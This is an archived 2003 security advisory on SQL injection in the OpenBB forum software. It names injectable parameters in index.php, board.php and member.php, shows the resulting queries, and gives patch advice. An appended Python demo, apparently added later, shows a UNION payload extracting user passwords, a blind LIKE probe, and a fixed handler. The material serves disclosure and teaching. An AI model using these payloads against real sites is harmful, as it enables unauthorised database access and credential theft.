Message-ID: <200304221200.23320.ripe@7a69ezine.org>
Date: Fri, 25 Apr 2003 09:22:48 +0200
From: Albert Puigsech Galicia <ripe@...9ezine.org>
To: bugtraq@...urityfocus.com
Subject: Multiple SQL injection on OpenBB forums


/-----------------------------------------------------------------------------\
|                             7 A 6 9 - A d v                          C: 008
|-----------------------------------------------------------------------------|
|
|                     [ SQL injection on OpenBB forums ]
|
\-----------------------------------------------------------------------------/
                                                                | 22/04/2003 |
                                                                \------------/

Data.
-----

        + Type:         SQL injection

        + Software:     OpenBB.

        + Versions:     1.1.0 (current version).

        + Exploit:      Yes.

        + Author:       Albert Puigsech Galicia

        + Contact:      ripe@...9ezine.org




Introduction.
-------------

        OpenBB is a complete forum written in PHP that uses a MySQL
database. More information about this software can be read on the official
OpenBB website: http://www.openbb.co.uk.


Description.
------------

        There are multiple SQL injection vulnerabilities in OpenBB's current
version.

        Every PHP script that builds an SQL query from a numeric value supplied
by the web user allows our own SQL code to be injected into that query, because
the value is concatenated into the SQL string without being quoted or checked.



Exploitation.
-------------

        As in other cases of SQL injection, it is possible to extract
information from the database. If the vulnerable host runs MySQL 3 we must
use the LIKE method(*), but if MySQL 4 is used we can use UNION, which makes
exploitation much easier.

        To exploit this vulnerability it is only necessary to add a space (or
%20) after the number, followed by our SQL alteration.

        Some examples of this SQL injection on OpenBB follow. Each example
gives the URL used to exploit it and the SQL query that results (look at
'<something>': that is where our own SQL code lands):


        http://vulnerable/index.php?CID=1 <something>

        SELECT guest, forumid, title, lastthread, lastposter, lastposterid,
        lastthreadid, lastpost, moderators, description, type, postcount,
        threadcount, forumkey FROM obb_forum_display WHERE
        parent = 3 <something> ORDER BY displayorder


        http://vulnerable/board.php?FID=2 <something>

        SELECT title, threadcount, type, hidden_topics, forumkey FROM
        obb_forum_display WHERE forumid = 2 <something>


        http://vulnerable/member.php?action=profile&UID=1 <something>

        SELECT * FROM obb_customvalues v INNER JOIN obb_custompermis p ON
        p.fieldid = v.fieldid INNER JOIN obb_customfields f on
        f.fieldid=v.fieldid WHERE v.userid=1 <something> AND
        p.canviewothers='t' AND p.groupid='0'



Patch.
------

        There is no patch yet, but the problem is solved if you check that
every numeric variable included in an SQL query really is a number (for
example by casting it to an integer) before using it. Putting inverted commas
around the value only helps if the value is also escaped; otherwise a quote
character in the input breaks out of the string and the injection remains.
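        As an added illustration of both the exploitation and the patch
sections above (this is not code from the advisory or from OpenBB), the
following Python script models the board.php query in an in-memory SQLite
database. The obb_forum_display table name and its five columns are taken from
the advisory; the obb_user table, all row values and the use of SQLite instead
of MySQL are assumptions made for the demo. It shows the unquoted numeric FID
accepting a UNION payload, a boolean LIKE probe of the kind usable when UNION
is not available (my reading of the advisory's "LIKE method"), and the fixed
handler that rejects anything that is not an integer and binds the value as a
parameter.

```python
import re
import sqlite3

# Constructed sample data: column set of obb_forum_display follows the
# advisory's board.php query; obb_user and all values are invented.
SCHEMA = """
CREATE TABLE obb_forum_display (
    forumid INTEGER, title TEXT, threadcount INTEGER, type TEXT,
    hidden_topics TEXT, forumkey TEXT);
INSERT INTO obb_forum_display VALUES (1, 'General', 10, 'public', 'n', 'key-general');
INSERT INTO obb_forum_display VALUES (2, 'Staff only', 3, 'private', 'y', 'key-staff');
CREATE TABLE obb_user (userid INTEGER, username TEXT, password TEXT);
INSERT INTO obb_user VALUES (1, 'admin', 'demo-hash-not-real');
"""

BOARD_SQL = ("SELECT title, threadcount, type, hidden_topics, forumkey "
             "FROM obb_forum_display WHERE forumid = ")


def open_db():
    """Fresh in-memory database loaded with the constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def board_vulnerable(db, fid):
    """Mirror of the advisory's board.php query: the user-supplied FID is
    pasted into the SQL text unquoted, so "2 UNION SELECT ..." is accepted."""
    return db.execute(BOARD_SQL + fid).fetchall()


def board_fixed(db, fid):
    """Patch advice from the advisory: verify the variable really is a number,
    then bind it as a parameter instead of concatenating it."""
    if not re.fullmatch(r"[0-9]+", fid):
        raise ValueError("FID must be an integer")
    return db.execute(BOARD_SQL + "?", (int(fid),)).fetchall()


# UNION payload (the "MySQL 4" route): five columns to match the original
# SELECT, pulling a user row back through the forum listing.
PAYLOAD = "2 UNION SELECT username, userid, password, 'x', 'y' FROM obb_user"


def like_probe(db, prefix):
    """Boolean inference for servers without UNION: append an AND condition
    that compares the hidden value against a guessed prefix with LIKE. The
    forum row comes back only when the guess is right, one character at a
    time. Hypothetical reconstruction of the advisory's LIKE method."""
    cond = ("2 AND (SELECT password FROM obb_user WHERE userid = 1) "
            "LIKE '" + prefix + "%'")
    return len(board_vulnerable(db, cond)) == 1


if __name__ == "__main__":
    db = open_db()
    print("normal:", board_vulnerable(db, "2"))
    print("union :", board_vulnerable(db, PAYLOAD))
    print("probe 'demo':", like_probe(db, "demo"), " probe 'zzz':", like_probe(db, "zzz"))
    try:
        board_fixed(db, PAYLOAD)
    except ValueError as e:
        print("fixed :", e)
```

        The fixed handler does two things: it refuses anything but digits,
so the trailing space that the advisory relies on is never reached, and it
binds the integer as a parameter, so even a future change that relaxes the
check cannot turn the value back into SQL text.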


--
>====================================
> Albert Puigsech Galicia (7a69)
>
> http://ripe.7a69ezine.org
>====================================




